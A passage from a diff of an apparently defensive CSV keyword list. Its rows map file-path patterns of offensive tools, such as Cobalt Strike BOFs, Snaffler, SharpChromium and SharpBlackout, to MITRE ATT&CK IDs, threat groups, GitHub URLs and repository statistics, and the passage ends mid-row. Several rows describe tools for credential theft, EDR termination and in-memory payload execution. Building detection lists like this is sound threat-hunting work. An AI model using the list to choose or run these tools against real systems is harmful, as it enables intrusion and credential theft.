+"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/servicetags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/SetProcessInjection.git*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*/setuserpass.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/setuserpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/sfp_openphish.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sfp_spider.py*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/sh_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/s-h-3-l-l/*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*/shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/ShadowForgeC2*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*/ShadowSpray.git*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/ShadowSpray/*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*/share/windows-resources/wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" -"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/share_enum.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SharpAzbelt.git*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*/SharpBlackout.git*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" @@ -5171,29 +5227,29 @@ "*/SharpCat/*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*/SharpChromium.git*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*/SharpCloud.git*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/SharpCompile/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/sharpcompile_*.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/SharpCradle/*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*/SharpDomainSpray.git*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*/SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to 